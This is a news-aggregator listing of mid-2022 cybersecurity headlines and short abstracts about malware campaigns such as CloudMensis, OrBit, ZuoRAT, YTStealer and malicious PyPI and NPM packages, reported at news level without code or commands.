EvilNum Malware Used to Target Entities Working with Cryptocurrency, Forex, Commodities Full Text
Abstract
TA4563 is a threat actor leveraging EvilNum malware to target European financial and investment entities, especially those with operations supporting foreign exchanges, cryptocurrency, and decentralized finance (DeFi).Proof Point
July 20, 2022
U.S. Cyber Command Exposes Malware Targeting Ukrainian Entities Full Text
Abstract
Ukrainian officials shared the information with the U.S. government, Cyber Command said, and then the agency uploaded various technical details to VirusTotal, Pastebin and GitHub. The agency did not attribute the malware.CyberScoop
July 19, 2022
Experts Uncover New CloudMensis Spyware Targeting Apple macOS Users Full Text
Abstract
Cybersecurity researchers have taken the wraps off a previously undocumented spyware targeting the Apple macOS operating system. The malware, codenamed CloudMensis by Slovak cybersecurity firm ESET, is said to exclusively use public cloud storage services such as pCloud, Yandex Disk, and Dropbox for receiving attacker commands and exfiltrating files. "Its capabilities clearly show that the intent of its operators is to gather information from the victims' Macs by exfiltrating documents, keystrokes, and screen captures," ESET researcher Marc-Etienne M.Léveillé said in a report published today. CloudMensis, written in Objective-C, was first discovered in April 2022 and is designed to strike both Intel and Apple silicon architectures. The initial infection vector for the attacks and the targets remain unknown as yet. But its very limited distribution is an indication that the malware is being used as part of a highly targeted operation directed against entities of iThe Hacker News
July 19, 2022
Several apps on the Play Store used to spread Joker, Facestealer and Coper malware Full Text
Abstract
Google blocked dozens of malicious apps from the official Play Store that were spreading Joker, Facestealer, and Coper malware families. Google has removed dozens of malicious apps from the official Play Store that were distributing Joker, Facestealer,...Security Affairs
July 19, 2022
Malicious Android apps with 300K installs found on Google Play Full Text
Abstract
Cybersecurity researchers have discovered three Android malware families infiltrating the Google Play Store, hiding their malicious payloads inside many seemingly innocuous applications.BleepingComputer
July 19, 2022
New CloudMensis malware backdoors Macs to steal victims’ data Full Text
Abstract
Unknown threat actors are using previously undetected malware to backdoor macOS devices and exfiltrate information in a highly targeted series of attacks.BleepingComputer
July 18, 2022
Several New Play Store Apps Spotted Distributing Joker, Facestealer and Coper Malware Full Text
Abstract
Google has taken steps to ax dozens of fraudulent apps from the official Play Store that were spotted propagating Joker, Facestealer, and Coper malware families through the virtual marketplace. While the Android storefront is considered to be a trusted source for discovering and installing apps, bad actors have repeatedly found ways to sneak past security barriers erected by Google in hopes of luring unsuspecting users into downloading malware-laced apps. The latest findings from Zscaler ThreatLabz and Pradeo are no different. "Joker is one of the most prominent malware families targeting Android devices," researchers Viral Gandhi and Himanshu Sharma said in a Monday report. "Despite public awareness of this particular malware, it keeps finding its way into Google's official app store by regularly modifying the malware's trace signatures including updates to the code, execution methods, and payload-retrieving techniques." Categorized as fleecewaThe Hacker News
July 18, 2022
MLNK Builder 4.2 released in Dark Web – malicious shortcut-based attacks are on the rise Full Text
Abstract
Cybercriminals released a new MLNK Builder 4.2 tool for malicious shortcuts (LNK) generation with an improved Powershell and VBS Obfuscator Resecurity, Inc. (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 worldwide, has detected...Security Affairs
July 17, 2022
WhatsApp Warns Users of Fake App Versions Full Text
Abstract
WhatsApp’s CEO has issued a strict warning to Android users about fake versions of the messaging app attempting to steal personal information stored on victims’ phones. A Twitter thread by the CEO revealed a fake Android app called 'Hey WhatsApp' being sold as a premium WhatsApp version. WhatsApp r ... Read MoreCyware Alerts - Hacker News
July 15, 2022
Password recovery tool infects industrial systems with Sality malware Full Text
Abstract
A threat actor is infecting industrial control systems (ICS) to create a botnet through password "cracking" software for programmable logic controllers (PLCs).BleepingComputer
July 14, 2022
PayPal-themed phishing kit allows complete identity theft Full Text
Abstract
The phishing kit leads users through a set of pages aimed at collecting information that can later be used to steal the victims’ identity and perform money laundering, open cryptocurrency accounts, make fraudulent tax return claims, and much more.Help Net Security
July 14, 2022
WhatsApp warns users of fake versions of the app trying to steal personal information Full Text
Abstract
Google Play Protect on Android now detects and disables previously downloaded versions of the fake WhatsApp apps, and the Google Play store shouldn’t experience any threat from these apps.Malwarebytes Labs
July 13, 2022
New Android malware on Google Play installed 3 million times Full Text
Abstract
A new Android malware family on the Google Play Store that secretly subscribes users to premium services was downloaded over 3,000,000 times.BleepingComputer
July 13, 2022
Researchers Uncover New Variants of the ChromeLoader Browser Hijacking Malware Full Text
Abstract
Cybersecurity researchers have uncovered new variants of the ChromeLoader information-stealing malware, highlighting its evolving feature set in a short span of time. Primarily used for hijacking victims' browser searches and presenting advertisements, ChromeLoader came to light in January 2022 and has been distributed in the form of ISO or DMG file downloads advertised via QR codes on Twitter and free gaming sites. ChromeLoader has also been codenamed Choziosi Loader and ChromeBack by the broader cybersecurity community. What makes the adware notable is that it's fashioned as a browser extension as opposed to a Windows executable (.exe) or Dynamic Link Library (.dll). The infections typically work by enticing unsuspecting users into downloading movie torrents or cracked video games through malvertising campaigns on pay-per-install sites and social media. Besides requesting invasive permissions to access browser data and manipulate web requests, it's also designed tThe Hacker News
July 12, 2022
Researchers Uncover New Attempts by Qakbot Malware to Evade Detection Full Text
Abstract
The operators behind the Qakbot malware are transforming their delivery vectors in an attempt to sidestep detection. "Most recently, threat actors have transformed their techniques to evade detection by using ZIP file extensions, enticing file names with common formats, and Excel (XLM) 4.0 to trick victims into downloading malicious attachments that install Qakbot," Zscaler Threatlabz researchers Tarun Dewan and Aditya Sharma said . Other methods adopted by the group include code obfuscation, introducing new layers in the attack chain from initial compromise to execution, and using multiple URLs as well as unknown file extensions (e.g., .OCX, .ooccxx, .dat, or .gyp) to deliver the payload. Also called QBot, QuackBot, or Pinkslipbot, Qakbot has been a recurring threat since late 2007, evolving from its initial days as a banking trojan to a modular information stealer capable of deploying next-stage payloads such as ransomware . "Qakbot is a flexible post-exploiThe Hacker News
July 11, 2022
PennyWise Targets Cryptocurrency Wallets Using YouTube Full Text
Abstract
The new PennyWise infostealer can target over 30 browsers and cryptocurrency apps, including crypto browser extensions and cold crypto wallets. It pretends to be a Bitcoin mining app on YouTube. The malware detects a browser and extracts information saved on it, including login credentials, cookies ... Read MoreCyware Alerts - Hacker News
July 9, 2022
Rozena backdoor delivered by exploiting the Follina bug Full Text
Abstract
Threat actors are exploiting the disclosed Follina Windows vulnerability to distribute the Rozena backdoor. Fortinet FortiGuard Labs researchers observed a phishing campaign that is leveraging the recently disclosed Follina security vulnerability...Security Affairs
July 08, 2022
Researchers Warn of Raspberry Robin’s Worm Targeting Windows Users Full Text
Abstract
Cybersecurity researchers are drawing attention to an ongoing wave of attacks linked to a threat cluster tracked as Raspberry Robin that's behind a Windows malware with worm-like capabilities. Describing it as a "persistent" and "spreading" threat, Cybereason said it observed a number of victims in Europe. The infections involve a worm that propagates over removable USB devices containing malicious a .LNK file and leverages compromised QNAP network-attached storage (NAS) devices for command-and-control. It was first documented by researchers from Red Canary in May 2022. Also codenamed QNAP worm by Sekoia, the malware leverages a legitimate Windows installer binary called "msiexec.exe" to download and execute a malicious shared library (DLL) from a compromised QNAP NAS appliance. "To make it harder to detect, Raspberry Robin leverages process injections in three legitimate Windows system processes," Cybereason researcher Loïc CastThe Hacker News
July 8, 2022
PyPI Packages Steal Telegram Cache Files, Add Windows Remote Desktop Accounts Full Text
Abstract
The primary packages of interest are flask-requests-complex, php-requests-complex, and tkinter-message-box. The first two packages contain no description but are certainly named after the popular 'requests' module.Sonatype
July 08, 2022
Experts Uncover 350 Browser Extension Variants Used in ABCsoup Adware Campaign Full Text
Abstract
A malicious browser extension with 350 variants is masquerading as a Google Translate add-on as part of an adware campaign targeting Russian users of Google Chrome, Opera, and Mozilla Firefox browsers. Mobile security firm Zimperium dubbed the malware family ABCsoup , stating the "extensions are installed onto a victim's machine via a Windows-based executable, bypassing most endpoint security solutions, along with the security controls found in the official extension stores." The rogue browser add-ons come with the same extension ID as that of Google Translate — " aapbdbdomjkkjkaonfhkkikfgjllcleb " — in an attempt to trick users into believing that they have installed a legitimate extension. The extensions are not available on the official browser web stores themselves. Rather they are delivered through different Windows executables that install the add-on on the victim's web browser. In the event the targeted user already has the Google Translate extThe Hacker News
July 8, 2022
Notable Droppers Emerge in Recent Threat Campaigns Full Text
Abstract
Researchers captured three different samples active in the threat campaign. The first sample is an Excel file with Excel 4.0 macros. The second is an LNK file (Windows shortcut file). The third sample is an ISO file (optical disk image).Fortinet
July 7, 2022
Large-scale cryptomining campaign is targeting the NPM JavaScript package repository Full Text
Abstract
Researchers uncovered a large-scale cryptocurrency mining campaign targeting the NPM JavaScript package repository. Checkmarx researchers spotted a new large-scale cryptocurrency mining campaign, tracked as CuteBoi, that is targeting the NPM JavaScript...Security Affairs
July 07, 2022
Over 1200 NPM Packages Found Involved in “CuteBoi” Cryptomining Campaign Full Text
Abstract
Researchers have disclosed a new large-scale cryptocurrency mining campaign targeting the NPM JavaScript package repository. The malicious activity, attributed to a software supply chain threat actor dubbed CuteBoi , involves an array of 1,283 rogue modules that were published in an automated fashion from over 1,000 different user accounts. "This was done using automation which includes the ability to pass the NPM 2FA challenge," Israeli application security testing company Checkmarx said . "This cluster of packages seems to be a part of an attacker experimenting at this point." All the released packages in question are said to harbor near-identical source code from an already existing package named eazyminer that's used to mine Monero by means of utilizing unused resources on web servers. One notable modification entails the URL to which the mined cryptocurrency should be sent, although installing the rogue modules will not bring about a negative effectThe Hacker News
July 07, 2022
New stealthy OrBit malware steals data from Linux devices Full Text
Abstract
A newly discovered Linux malware is being used to stealthily steal information from backdoored Linux systems and infect all running processes on the machine.BleepingComputer
July 7, 2022
OrBit, a new sophisticated Linux malware still undetected Full Text
Abstract
Cybersecurity researchers warn of new malware, tracked as OrBit, which is a fully undetected Linux threat. Cybersecurity researchers at Intezer have uncovered a new Linux malware, tracked as OrBit, that is still undetected. The malware can be installed...Security Affairs
July 06, 2022
Researchers Warn of New OrBit Linux Malware That Hijacks Execution Flow Full Text
Abstract
Cybersecurity researchers have taken the wraps off a new and entirely undetected Linux threat dubbed OrBit , signally a growing trend of malware attacks geared towards the popular operating system. The malware gets its name from one of the filenames that's utilized to temporarily store the output of executed commands ("/tmp/.orbit"), according to cybersecurity firm Intezer. "It can be installed either with persistence capabilities or as a volatile implant," security researcher Nicole Fishbein said . "The malware implements advanced evasion techniques and gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands." OrBit is the fourth Linux malware to have come to light in a short span of three months after BPFDoor , Symbiote , and Syslogk . The malware also functions a lot like Symbiote in that it's designed to infect all of tThe Hacker News
July 6, 2022
Toll Fraud Malware Catching Up Quickly, Microsoft Warns Full Text
Abstract
Microsoft warned of the toll fraud malware threat that targets Android users to drain their wallets by automatically subscribing them to premium services. Toll fraud works over Wireless Application Protocol (WAP) that allows consumers to subscribe to paid content. To stay protected from toll fraud ... Read MoreCyware Alerts - Hacker News
July 6, 2022
Near-undetectable malware linked to Russia’s Cozy Bear Full Text
Abstract
Palo Alto Networks Unit 42's analysts assert that the malware was spotted in May 2022 and contains a malicious payload that suggests it was created using a tool called Brute Ratel (BRC4).The Register
July 6, 2022
PennyWise Malware Steals Data from Cryptocurrency Wallets and Browsers Full Text
Abstract
Researchers observed multiple samples of the malware in the wild, making it an active threat. The threat focuses on stealing sensitive browser data and cryptocurrency wallets, and it comes as the Pentagon has raised concerns about the blockchain.Tech Republic
July 6, 2022
Malicious NPM packages used to grab data from apps, websites Full Text
Abstract
Researchers from ReversingLabs discovered tens of malicious NPM packages stealing data from apps and web forms. Researchers from ReversingLabs discovered a couple of dozen NPM packages that included malicious code designed to steal data from apps...Security Affairs
July 5, 2022
ZuoRAT Malware with Hallmarks of a State-Backed Threat Actor Full Text
Abstract
The new ZuoRAT is targeting Small Office/Home Office, or SOHO, routers across North America and Europe, as part of an advanced campaign. An investigation into the case divulged that the trojan can cripple routers from multiple brands, such as ASUS, DrayTek, Cisco, and NETGEAR. For mitigation, ... Read MoreCyware Alerts - Hacker News
July 05, 2022
Researchers Uncover Malicious NPM Packages Stealing Data from Apps and Web Forms Full Text
Abstract
A widespread software supply chain attack has targeted the NPM package manager at least since December 2021 with rogue modules designed to steal data entered in forms by users on websites that include them. The coordinated attack, dubbed IconBurst by ReversingLabs, involves no fewer than two dozen NPM packages that include obfuscated JavaScript, which comes with malicious code to harvest sensitive data from forms embedded downstream mobile applications and websites. "These clearly malicious attacks relied on typo-squatting, a technique in which attackers offer up packages via public repositories with names that are similar to — or common misspellings of — legitimate packages," security researcher Karlo Zanki said in a Tuesday report. "Attackers impersonated high-traffic NPM modules like umbrellajs and packages published by ionic.io." The packages in question, most of which were published in the last months, have been collectively downloaded more than 27,000 tThe Hacker News
July 5, 2022
YouTube Creators Accounts are a New Target for YTStealer Malware Full Text
Abstract
A new infostealer, named YTStealer, is targeting content creators on YouTube in an attempt to steal their authentication tokens and take over their accounts. The buyers of the compromised accounts typically use these stolen authentication cookies to hijack YouTube channels for various scams or dema ... Read MoreCyware Alerts - Hacker News
July 04, 2022
Some Worms Use Their Powers for Good Full Text
Abstract
Gardeners know that worms are good. Cybersecurity professionals know that worms are bad . Very bad. In fact, worms are literally the most devasting force for evil known to the computing world. The MyDoom worm holds the dubious position of most costly computer malware ever – responsible for some $52 billion in damage. In second place… Sobig , another worm. It turns out, however, that there are exceptions to every rule. Some biological worms are actually not welcome in most gardens. And some cyber worms, it seems, can use their powers for good … Meet Hopper, The Good Worm Detection tools are not good at catching non-exploit-based propagation , which is what worms do best. Most cybersecurity solutions are less resilient to worm attack methods like token impersonation and others that take advantage of deficient internal configurations - PAM, segmentation, insecure credential storage, and more. So, what better way to beat a stealthy worm than with … another stealthy worm?The Hacker News
July 4, 2022
Raspberry Robin Worm Infects Windows Networks at Technology and Manufacturing Firms Full Text
Abstract
The malware uses cmd.exe to read and execute a file stored on the infected external drive, it leverages msiexec.exe for external network communication to a rogue domain used as C2 to download and install a DLL library file.Neowin
July 4, 2022
Revive: New Android malware Posing as 2FA App for a Spanish Bank Full Text
Abstract
A new Revive banking trojan was found targeting users of BBVA, a Spanish financial services company. Revive follows a more focused approach - the bank and not customers as its prime targets. While the malware is in its early developmental stages, it is designed for persistent campaigns. Training em ... Read MoreCyware Alerts - Hacker News
July 3, 2022
Microsoft: Raspberry Robin worm already infected hundreds of networks Full Text
Abstract
Microsoft announced that the Windows worm Raspberry Robin has already infected the networks of hundreds of organizations. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable...Security Affairs
July 02, 2022
Microsoft finds Raspberry Robin worm in hundreds of Windows networks Full Text
Abstract
Microsoft says that a recently spotted Windows worm has been found on the networks of hundreds of organizations from various industry sectors.BleepingComputer
July 01, 2022
Microsoft Warns About Evolving Capabilities of Toll Fraud Android Malware Apps Full Text
Abstract
Microsoft has detailed the evolving capabilities of toll fraud malware apps on Android, pointing out its "complex multi-step attack flow" and an improved mechanism to evade security analysis. Toll fraud belongs to a category of billing fraud wherein malicious mobile applications come with hidden subscription fees, roping in unsuspecting users to premium content without their knowledge or consent. It's also different from other fleeceware threats in that the malicious functions are only carried out when a compromised device is connected to one of its target network operators. "It also, by default, uses cellular connection for its activities and forces devices to connect to the mobile network even if a Wi-Fi connection is available," Dimitrios Valsamaras and Sang Shin Jung of the Microsoft 365 Defender Research Team said in an exhaustive analysis. "Once the connection to a target network is confirmed, it stealthily initiates a fraudulent subscriptionThe Hacker News
July 1, 2022
SessionManager Backdoor employed in attacks on Microsoft IIS servers worldwide Full Text
Abstract
Researchers warn of a new 'SessionManager' Backdoor that was employed in attacks targeting Microsoft IIS Servers since March 2021. Researchers from Kaspersky Lab have discovered a new 'SessionManager' Backdoor that was employed in attacks targeting...Security Affairs
July 01, 2022
New ‘SessionManager’ Backdoor Targeting Microsoft IIS Servers in the Wild Full Text
Abstract
A newly discovered malware has been put to use in the wild at least since March 2021 to backdoor Microsoft Exchange servers belonging to a wide range of entities worldwide, with infections lingering in 20 organizations as of June 2022. Dubbed SessionManager , the malicious tool masquerades as a module for Internet Information Services ( IIS ), a web server software for Windows systems, after exploiting one of the ProxyLogon flaws within Exchange servers. Targets included 24 distinct NGOs, government, military, and industrial organizations spanning Africa, South America, Asia, Europe, Russia and the Middle East. A total of 34 servers have been compromised by a SessionManager variant to date. This is far from the first time the technique has been observed in real-world attacks . The use of a rogue IIS module as a means to distribute stealthy implants has its echoes in an Outlook credential stealer called Owowa that came to light in December 2021. "Dropping an IIS module aThe Hacker News
July 1, 2022
Microsoft Warns of Toll Fraud Malware on Android That Switches Off Wi-Fi, Empties Users’ Wallets Full Text
Abstract
Microsoft explains in a blogpost that WAP fraud malware on Android is capable of targeting users of specific network operators and uses dynamic code loading -- a method for hiding malicious behavior.ZDNet
June 30, 2022
Toll fraud malware disables your WiFi to force premium subscriptions Full Text
Abstract
Microsoft is warning that toll fraud malware is one of the most prevalent threats on Android and that it is evolving with features that allow automatic subscription to premium services.BleepingComputer
June 30, 2022
Microsoft Exchange servers worldwide backdoored with new malware Full Text
Abstract
A newly discovered lightweight and persistent malware was used by attackers to backdoor Microsoft Exchange servers belonging to government and military organizations from Europe, the Middle East, Asia, and Africa.BleepingComputer
June 30, 2022
Microsoft Warns of New Updated ‘8220’ Linux Malware that Installs Cryptominers Full Text
Abstract
Microsoft has called out recent work from the so-called "8220 gang" group, which has recently been spotted exploiting the critical bug affecting Atlassian Confluence Server and Data Center, tracked as CVE-2022-26134.ZDNet
June 30, 2022
YTStealer info-stealing malware targets YouTube content creators Full Text
Abstract
Researchers detailed a new information-stealing malware, dubbed YTStealer, that targets YouTube content creators. Intezer cybersecurity researchers have detailed a new information-stealing malware, dubbed YTStealer, that was developed to steal authentication...Security Affairs
June 30, 2022
XFiles info-stealing malware adds support for Follina delivery Full Text
Abstract
The XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers.BleepingComputer
June 29, 2022
PyPi Packages Caught Stealing and Making AWS Keys and More Public Full Text
Abstract
The PyPI repository containing malicious Python packages are steal sensitive data before sending it to publicly exposed endpoints. The sensitive data includes AWS credentials as well as environment variables. The stolen data is stored in TXT files and uploaded to a PyGrata[.]com domain. The endpoin ... Read MoreCyware Alerts - Hacker News
June 29, 2022
New YTStealer Malware Aims to Hijack Accounts of YouTube Content Creators Full Text
Abstract
Cybersecurity researchers have documented a new information-stealing malware that targets YouTube content creators by plundering their authentication cookies. Dubbed "YTStealer" by Intezer, the malicious tool is likely believed to be sold as a service on the dark web, with it distributed using fake installers that also drop RedLine Stealer and Vidar. "What sets YTStealer aside from other stealers sold on the dark web market is that it is solely focused on harvesting credentials for one single service instead of grabbing everything it can get ahold of," security researcher Joakim Kenndy said in a report shared with The Hacker News. The malware's modus operandi, however, mirrors its counterparts in that it extracts the cookie information from the web browser's database files in the user's profile folder. The reasoning given behind targeting content creators is that it uses one of the installed browsers on the infected machine to gather YouTube channelThe Hacker News
June 29, 2022
New YTStealer malware steals accounts from YouTube Creators Full Text
Abstract
A new information-stealing malware named YTStealer is targeting YouTube content creators and attempting to steal their authentication tokens and hijack their channels.BleepingComputer
June 29, 2022
Keona Clipper Steals Cryptocurrency Payments Full Text
Abstract
Keona Clipper, a new malware threat is stealing cryptocurrencies from infected computers by replacing the user wallet address with its own. It leverages Telegram to stay hidden. Researchers identified over 90 different iterations of Keona since May, indicating wide deployment. Users should take utm ... Read MoreCyware Alerts - Hacker News
June 29, 2022
Raccoon Stealer Reappears With a New Version Full Text
Abstract
Raccoon Stealer v2 is written in C/C++ using WinApi. The malware downloads legitimate third-party DLLs from its C2 servers. It is believed that the new version was available on Telegram for sale since May 17.Cyware Alerts - Hacker News
June 28, 2022
ZuoRAT malware hijacks SOHO Routers to spy in the vitims Full Text
Abstract
A new RAT dubbed ZuoRAT was employed in a campaign aimed at small office/home office (SOHO) routers in North American and Europe. Researchers from Black Lotus Labs, the threat intelligence division of Lumen Technologies, have discovered a new remote...Security Affairs
June 28, 2022
ZuoRAT Malware Hijacking Home-Office Routers to Spy on Targeted Networks Full Text
Abstract
A never-before-seen remote access trojan dubbed ZuoRAT has been singling out small office/home office (SOHO) routers as part of a sophisticated campaign targeting North American and European networks. The malware "grants the actor the ability to pivot into the local network and gain access to additional systems on the LAN by hijacking network communications to maintain an undetected foothold," researchers from Lumen Black Lotus Labs said in a report shared with The Hacker News. The stealthy operation, which targeted routers from ASUS, Cisco, DrayTek, and NETGEAR, is believed to have commenced in early 2020 during the initial months of the COVID-19 pandemic, effectively remaining under the radar for over two years. "Consumers and remote employees routinely use SOHO routers, but these devices are rarely monitored or patched, which makes them one of the weakest points of a network's perimeter," the company's threat intelligence team said. Initial accessThe Hacker News
June 28, 2022
New ZuoRAT malware targets SOHO routers in North America, Europe Full Text
Abstract
A newly discovered multistage remote access trojan (RAT) dubbed ZuoRAT has been used to target remote workers via small office/home office (SOHO) routers across North America and Europe undetected since 2020.BleepingComputer
June 28, 2022
New Android Banking Trojan ‘Revive’ Targeting Users of Spanish Financial Services Full Text
Abstract
A previously unknown Android banking trojan has been discovered in the wild, targeting users of the Spanish financial services company BBVA. Said to be in its early stages of development, the malware — dubbed Revive by Italian cybersecurity firm Cleafy — was first observed on June 15, 2022 and distributed by means of phishing campaigns. "The name Revive has been chosen since one of the functionality of the malware (called by the [threat actors] precisely 'revive') is restarting in case the malware stops working, Cleafy researchers Federico Valentini and Francesco Iubatti said in a Monday write-up. Available for download from rogue phishing pages ("bbva.appsecureguide[.]com" or "bbva.european2fa[.]com") as a lure to trick users into downloading the app, the malware impersonates the bank's two-factor authentication (2FA) app and is said to be inspired from open-source spyware called Teardroid , with the authors tweaking the original source cThe Hacker News
June 28, 2022
Raccoon Stealer is back with a new version to steal your passwords Full Text
Abstract
The Raccoon Stealer malware is back with a second major version circulating on cybercrime forums, offering hackers elevated password-stealing functionality and upgraded operational capacity.BleepingComputer
June 27, 2022
Android malware ‘Revive’ impersonates BBVA bank’s 2FA app Full Text
Abstract
A new Android banking malware named Revive has been discovered that impersonates a 2FA application required to log into BBVA bank accounts in Spain.BleepingComputer
June 27, 2022
Ukrainian telecommunications operators hit by DarkCrystal RAT malware Full Text
Abstract
The Ukrainian CERT-UA warns of attacks against Ukrainian telecommunications operators involving the DarkCrystal RAT. The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a malware campaign targeting Ukrainian telecommunications...Security Affairs
June 27, 2022
Researchers Warn of ‘Matanbuchus’ Malware Campaign Dropping Cobalt Strike Beacons Full Text
Abstract
A malware-as-a-service (Maas) dubbed Matanbuchus has been observed spreading through phishing campaigns, ultimately dropping the Cobalt Strike post-exploitation framework on compromised machines. Matanbuchus, like other malware loaders such as BazarLoader , Bumblebee , and Colibri , is engineered to download and execute second-stage executables from command-and-control (C&C) servers on infected systems without detection. Available on Russian-speaking cybercrime forums for a price of $2,500 since February 2021, the malware is equipped with capabilities to launch .EXE and .DLL files in memory and run arbitrary PowerShell commands. The findings, released by threat intelligence firm Cyble last week, document the latest infection chain associated with the loader, which is linked to a threat actor who goes by the online moniker BelialDemon. "If we look historically, BelialDemon has been involved in the development of malware loaders," Unit 42 researchers Jeff WhiteThe Hacker News
June 26, 2022
CopperStealer Malware is Spreading Through Fake Cracks Full Text
Abstract
Trend Micro observed a new CopperStealer malware variant propagated via websites offering fake cracks. The malware has resorted to using platforms such as Telegram. Google Chrome, Microsoft Edge, Mozilla Firefox, Opera, and Yandex are among the browsers from which the malware can steal Facebook-rel ... Read MoreCyware Alerts - Hacker News
June 25, 2022
New Activities of RIG Exploit Kit Observed Full Text
Abstract
RIG is one of the actively used exploit kits to distribute a variety of malware. First spotted in 2014, the kit has a unique capability to merge with different web technologies such as VB Script, Flash, and DoSWF to evade detection.Cyware Alerts - Hacker News
June 25, 2022
PyPi python packages caught sending stolen AWS keys to unsecured sites Full Text
Abstract
Multiple malicious Python packages available on the PyPI repository were caught stealing sensitive information like AWS credentials and transmitting it to publicly exposed endpoints accessible by anyone.BleepingComputer
June 25, 2022
This new malware diverts cryptocurrency payments to attacker-controlled wallets Full Text
Abstract
Researchers from Cyble have analyzed a new malware dubbed Keona Clipper that aims to steal cryptocurrencies from infected computers and uses Telegram to increase its stealth.Tech Republic
June 25, 2022
Multiple malicious packages in PyPI repository found stealing AWS secrets Full Text
Abstract
Researchers discovered multiple malicious Python packages in the official PyPI repository stealing AWS credentials and other info. Sonatype researchers discovered multiple Python packages in the official PyPI repository that have been developed to steal...Security Affairs
June 24, 2022
Multiple Backdoored Python Libraries Caught Stealing AWS Secrets and Keys Full Text
Abstract
Researchers have discovered a number of malicious Python packages in the official third-party software repository that are engineered to exfiltrate AWS credentials and environment variables to a publicly exposed endpoint. The list of packages includes loglib-modules, pyg-modules, pygrata, pygrata-utils, and hkg-sol-utils, according to Sonatype security researcher Ax Sharma. The packages and as well as the endpoint have now been taken down. "Some of these packages either contain code that reads and exfiltrates your secrets or use one of the dependencies that will do the job," Sharma said . The malicious code injected into "loglib-modules" and "pygrata-utils" allow it to harvest AWS credentials, network interface information, and environment variables and export them to a remote endpoint: "hxxp://graph.pygrata[.]com:8000/upload." Troublingly, the endpoints hosting this information in the form of hundreds of .TXT files were not secured by anyThe Hacker News
June 23, 2022
New ‘Quantum’ Builder Lets Attackers Easily Create Malicious Windows Shortcuts Full Text
Abstract
A new malware tool that enables cybercriminal actors to build malicious Windows shortcut ( .LNK ) files has been spotted for sale on cybercrime forums. Dubbed Quantum Lnk Builder , the software makes it possible to spoof any extension and choose from over 300 icons, not to mention support UAC and Windows SmartScreen bypass as well as "multiple payloads per .LNK" file. Also offered are capabilities to generate .HTA and disk image (.ISO) payloads. Quantum Builder is available for lease at different price points: €189 a month, €355 for two months, €899 for six months, or as a one-off lifetime purchase for €1,500. ".LNK files are shortcut files that reference other files, folders, or applications to open them," Cyble researchers said in a report. "The [threat actor] leverages the .LNK files and drops malicious payloads using LOLBins [living-off-the-land binaries]." Early evidence of malware samples using Quantum Builder in the wild is said to daThe Hacker News
June 23, 2022
AvosLocker Adopts a Mix of Commercial Tools and Malicious Payloads Full Text
Abstract
The attackers have used Cobalt Strike, Sliver, and several commercially available network scanners. They targeted an ESXi server exposed over VMWare Horizon UAG by exploiting the Log4Shell flaw.Cyware Alerts - Hacker News
June 23, 2022
New Activities of RIG Exploit Kit Observed Full Text
Abstract
According to Bitdefender researchers, the operators behind the RIG exploit kit have swapped the Raccoon Stealer malware with Dridex trojan as part of an ongoing campaign that commenced in January 2021.Cyware Alerts - Hacker News
June 21, 2022
RIG Exploit Kit Now Infects Victims’ PCs With Dridex Instead of Raccoon Stealer Full Text
Abstract
The operators behind the Rig Exploit Kit have swapped the Raccoon Stealer malware for the Dridex financial trojan as part of an ongoing campaign that commenced in January 2022. The switch in modus operandi, spotted by Romanian company Bitdefender, comes in the wake of Raccoon Stealer temporarily closing the project after one of its team members responsible for critical operations passed away in the Russo-Ukrainian war in March 2022. The Rig Exploit Kit is notable for its abuse of browser exploits to distribute an array of malware. First spotted in 2019, Raccoon Stealer is a credential-stealing trojan that's advertised and sold on underground forums as a malware-as-a-service (MaaS) for $200 a month. That said, the Raccoon Stealer actors are already working on a second version that's expected to be "rewritten from scratch and optimized." But the void left by the malware's exit is being filled by other information stealers such as RedLine Stealer and Vidar.The Hacker News
June 20, 2022
BRATA Android Malware evolves and targets the UK, Spain, and Italy Full Text
Abstract
The developers behind the BRATA Android malware have implemented additional features to avoid detection. The operators behind the BRATA Android malware have implemented more features to make their attacks stealthy. The malware was first...Security Affairs
June 19, 2022
BRATA Android Malware Gains Advanced Mobile Threat Capabilities Full Text
Abstract
The operators behind BRATA have once again added more capabilities to the Android mobile malware in an attempt to make their attacks against financial apps more stealthy. "In fact, the modus operandi now fits into an Advanced Persistent Threat (APT) activity pattern," Italian cybersecurity firm Cleafy said in a report last week. "This term is used to describe an attack campaign in which criminals establish a long-term presence on a targeted network to steal sensitive information." An acronym for "Brazilian Remote Access Tool Android," BRATA was first detected in the wild in Brazil in late 2018, before making its first appearance in Europe last April, while masquerading as antivirus software and other common productivity tools to trick users into downloading them. The change in the attack pattern, which scaled new highs in early April 2022, involves tailoring the malware to strike a specific financial institution at a time, switching to a differeThe Hacker News
June 19, 2022
Android-wiping BRATA malware is evolving into a persistent threat Full Text
Abstract
The threat actors operating the BRATA banking trojan have evolved their tactics and incorporated new information-stealing features into their malware.BleepingComputer
June 18, 2022
New IceXLoader 3.0 – Developers Warm Up to Nim Full Text
Abstract
The latest version is written in Nim, a relatively new language utilized by threat actors over the past two years, most notably by the NimzaLoader variant of BazarLoader used by the TrickBot group.Fortinet
June 16, 2022
New MaliBot Android banking malware spreads as a crypto miner Full Text
Abstract
Threat analysts have discovered a new Android malware strain named MaliBot, which poses as a cryptocurrency mining app or the Chrome web browser to target users in Italy and Spain.BleepingComputer
June 16, 2022
RedLine Stealer Returns in a New Campaign Full Text
Abstract
It spreads via fake software imitating legitimate cryptocurrency or NFT wallet applications such as Gigaland NFT marketplace and Dinox (NFT-themed collectible game) to lure users.Cyware Alerts - Hacker News
June 16, 2022
Malicious apps continue to spread through the Google Play Store Full Text
Abstract
Researchers at antivirus firm Dr. Web discovered malware in the Google Play Store that was downloaded two million times. An investigation conducted by the antivirus firm Dr. Web in May resulted in the discovery of multiple adware and information-stealing...Security Affairs
June 15, 2022
MaliBot: A New Android Banking Trojan Spotted in the Wild Full Text
Abstract
